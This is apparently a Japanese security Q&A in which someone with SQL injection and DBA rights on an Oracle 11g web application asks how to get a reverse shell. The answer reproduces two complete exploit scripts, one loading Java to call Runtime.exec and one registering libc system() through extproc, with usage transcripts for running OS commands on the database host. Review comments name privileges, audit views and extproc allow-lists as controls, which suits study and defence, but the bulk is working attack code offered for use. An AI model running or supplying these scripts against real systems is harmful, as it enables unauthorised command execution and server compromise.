ASPコードを使用するWebサイトでSQLインジェクションをテストしています。すべてのデータベースとテーブルを正常に取得できます。現在のユーザーはDBA権限を持っています。このSQLインジェクションからどのようにしてリバースシェルを取得できますか? Oracleのバージョンは「Oracle Database 11g Enterprise Edition Release 11.1.0.7.0」です。
Oracle DBMSでコードを実行するこの2つの方法を試すことができます。
1番目はJavaコードを使用しています: http://www.0xdeadbeef.info/exploits/raptor_oraexec.sql
-- Usage example:
-- $ sqlplus "/ as sysdba"
-- [...]
-- SQL> @raptor_oraexec.sql
-- [...]
-- SQL> exec javawritefile('/tmp/mytest', '/bin/ls -l > /tmp/aaa');
-- SQL> exec javawritefile('/tmp/mytest', '/bin/ls -l / > /tmp/bbb');
-- SQL> exec dbms_Java.set_output(2000);
-- SQL> set serveroutput on;
-- SQL> exec javareadfile('/tmp/mytest');
-- /bin/ls -l > /tmp/aaa
-- /bin/ls -l / >/tmp/bbb
-- SQL> exec javacmd('/bin/sh /tmp/mytest');
-- SQL> !sh
-- $ ls -rtl /tmp/
-- [...]
-- -rw-r--r-- 1 Oracle system 45 Nov 22 12:20 mytest
-- -rw-r--r-- 1 Oracle system 1645 Nov 22 12:20 aaa
-- -rw-r--r-- 1 Oracle system 8267 Nov 22 12:20 bbb
-- [...]
--
-- Java source loaded into the database: a single class with three static
-- helpers (run a command, read a file, append a line to a file).  All of it
-- executes inside the Oracle JVM on the database host, under the OS account
-- the server runs as (the transcript above shows the written files owned by
-- "Oracle").
-- NOTE(review): loading and using this requires CREATE PROCEDURE plus Java
-- runtime permissions (normally granted through DBMS_JAVA.GRANT_PERMISSION);
-- the question states the injected account holds DBA, which is the real
-- precondition.  Loaded Java sources are visible in DBA_OBJECTS
-- (OBJECT_TYPE = 'JAVA SOURCE') and DBA_SOURCE, and the CREATE PROCEDURE /
-- CREATE JAVA actions are auditable -- an application account should have
-- neither.
create or replace and resolve Java source named "oraexec" as
import Java.lang.*;
import Java.io.*;
public class oraexec
{
/*
* Command execution module
* Hands `command` to Runtime.exec().  The returned Process is dropped, so
* stdout/stderr are never read back; the usage transcript above works
* around that by redirecting output into files and reading them with
* readFile().
*/
public static void execCommand(String command) throws IOException
{
Runtime.getRuntime().exec(command);
}
/*
* File reading module
* Prints the file line by line on System.out.  Inside Oracle that output
* only reaches the client when dbms_java.set_output / serveroutput are
* enabled (see usage above).  The reader is not closed if readLine() throws.
*/
public static void readFile(String filename) throws IOException
{
FileReader f = new FileReader(filename);
BufferedReader fr = new BufferedReader(f);
String text = fr.readLine();
while (text != null) {
System.out.println(text);
text = fr.readLine();
}
fr.close();
}
/*
* File writing module
* Appends `line` plus a newline to `filename`; the file is created if it
* does not exist (FileWriter with append=true).
*/
public static void writeFile(String filename, String line) throws IOException
{
FileWriter f = new FileWriter(filename, true); /* append */
BufferedWriter fw = new BufferedWriter(f);
fw.write(line);
fw.write("\n");
fw.close();
}
}
/
-- usage: exec javacmd('command');
-- PL/SQL call spec: javacmd(p_command) is bound to oraexec.execCommand, so a
-- plain PL/SQL call (or an injected one) spawns an OS process on the database
-- host.  Nothing is returned to the caller.
-- NOTE(review): the effective control is the Java permission that allows
-- execution (java.io.FilePermission with the "execute" action), not the
-- PL/SQL grant; review who holds it via DBA_JAVA_POLICY.
create or replace procedure javacmd(p_command varchar2) as
language Java
name 'oraexec.execCommand(Java.lang.String)';
/
-- usage: exec dbms_Java.set_output(2000);
-- set serveroutput on;
-- exec javareadfile('/path/to/file');
-- PL/SQL call spec: javareadfile(p_filename) is bound to oraexec.readFile.
-- The file is read with the database server's OS privileges and echoed via
-- System.out, which is why the two set_output / serveroutput steps above are
-- needed to see it from the client.
-- NOTE(review): read access is governed by java.io.FilePermission grants in
-- the database, independent of any PL/SQL privilege on this procedure.
create or replace procedure javareadfile(p_filename in varchar2) as
language Java
name 'oraexec.readFile(Java.lang.String)';
/
-- usage: exec javawritefile('/path/to/file', 'line to append');
-- PL/SQL call spec: javawritefile(p_filename, p_line) is bound to
-- oraexec.writeFile, which appends p_line and a newline to the file (creating
-- it if absent) as the server's OS user.  The transcript above shows it used
-- to stage a script under /tmp that javacmd then runs.
-- NOTE(review): unexpected new files owned by the database OS account, and
-- Java FilePermission "write" grants to application schemas, are the
-- detection points for this pattern.
create or replace procedure javawritefile(p_filename in varchar2, p_line in varchar2) as
language Java
name 'oraexec.writeFile(Java.lang.String, Java.lang.String)';
/
2番目はExtProcを使用しています: http://www.0xdeadbeef.info/exploits/raptor_oraextproc.sql
-- Usage example:
-- $ echo $Oracle_HOME
-- /opt/Oracle/
-- $ sqlplus "/ as sysdba"
-- [...]
-- Connected to:
-- Oracle9i Enterprise Edition Release 9.2.0.1.0 - 64bit Production
-- With the Partitioning, OLAP and Oracle Data Mining options
-- JServer Release 9.2.0.1.0 - Production
-- SQL> @raptor_oraextproc.sql
-- [...]
-- exec oracmd32.exec('touch /tmp/32');
-- [...]
-- ERROR at line 1:
-- ORA-06520: PL/SQL: Error loading external library
-- ORA-06522: ld.so.1: extprocPLSExtProc: fatal:
-- /opt/Oracle/bin/../../../../../../../lib/32/libc.so.1: wrong ELF class:
-- ELFCLASS32
-- [...]
-- SQL> exec oracmd64.exec('touch /tmp/64');
-- SQL> !ls -l /tmp/64
-- -rw-r--r-- 1 Oracle orainst 0 Dec 19 13:49 /tmp/64
--
-- library for 32-bit Oracle releases
-- Registers the system C library itself as a PL/SQL external library so that
-- extproc will load it.  The path climbs out of $Oracle_HOME with ".." to
-- reach /lib/32; this variant targets a 32-bit extproc (the transcript above
-- shows it failing with "wrong ELF class" on a 64-bit server).
-- NOTE(review): this statement needs the CREATE LIBRARY privilege.  Registered
-- libraries are listed in DBA_LIBRARIES; an EXTPROC_DLLS=ONLY:... allow-list in
-- the listener's extproc ENVS restricts which shared objects extproc may load,
-- and running extproc under a separate low-privilege OS account limits the
-- impact of any library it does load.
create or replace library exec_Shell32 as
'$Oracle_HOME/bin/../../../../../../../lib/32/libc.so.1';
/
-- library for 64-bit Oracle releases
-- Same as the 32-bit registration above but pointing at /lib/64, for a
-- 64-bit extproc (the transcript shows this variant succeeding on a 64-bit
-- Oracle9i install).
-- NOTE(review): same controls apply -- CREATE LIBRARY privilege, visibility in
-- DBA_LIBRARIES, and an EXTPROC_DLLS=ONLY:... allow-list for extproc.
create or replace library exec_Shell64 as
'$Oracle_HOME/bin/../../../../../../../lib/64/libc.so.1';
/
-- package for 32-bit Oracle releases
-- usage: exec oracmd32.exec('command');
-- Package specification only: declares exec(cmdstring) with no return value.
-- The body below binds it to a C entry point in exec_Shell32.
create or replace package oracmd32 as
procedure exec(cmdstring in char);
end oracmd32;
/
-- External-procedure call spec: exec(cmdstring) is bound to the "system"
-- symbol of the library registered as exec_Shell32, i.e. libc system(3),
-- which passes the string to the OS shell via the extproc agent.  Output and
-- exit status are not returned (procedure, no OUT parameter).
-- NOTE(review): the transcript shows the resulting file owned by the Oracle
-- OS account, so extproc here runs with the database's own OS privileges --
-- exactly what a dedicated extproc account would prevent.  CHAR-to-C
-- parameter marshalling is left at its default; not shown on the page.
create or replace package body oracmd32 as
procedure exec(cmdstring in char)
is external
name "system"
library exec_Shell32
language c;
end oracmd32;
/
-- package for 64-bit Oracle releases
-- usage: exec oracmd64.exec('command');
-- Package specification only: declares exec(cmdstring) with no return value.
-- The body below binds it to a C entry point in exec_Shell64.
create or replace package oracmd64 as
procedure exec(cmdstring in char);
end oracmd64;
/
-- External-procedure call spec, 64-bit variant: exec(cmdstring) is bound to
-- the "system" symbol of exec_Shell64 (libc system(3)), so the string is run
-- by the OS shell through the extproc agent.  Nothing is returned.
-- NOTE(review): identical to the 32-bit body except for the library; the
-- mitigations are the same -- restrict CREATE LIBRARY, allow-list extproc
-- libraries with EXTPROC_DLLS, and run extproc as a low-privilege OS user.
create or replace package body oracmd64 as
procedure exec(cmdstring in char)
is external
name "system"
library exec_Shell64
language c;
end oracmd64;
/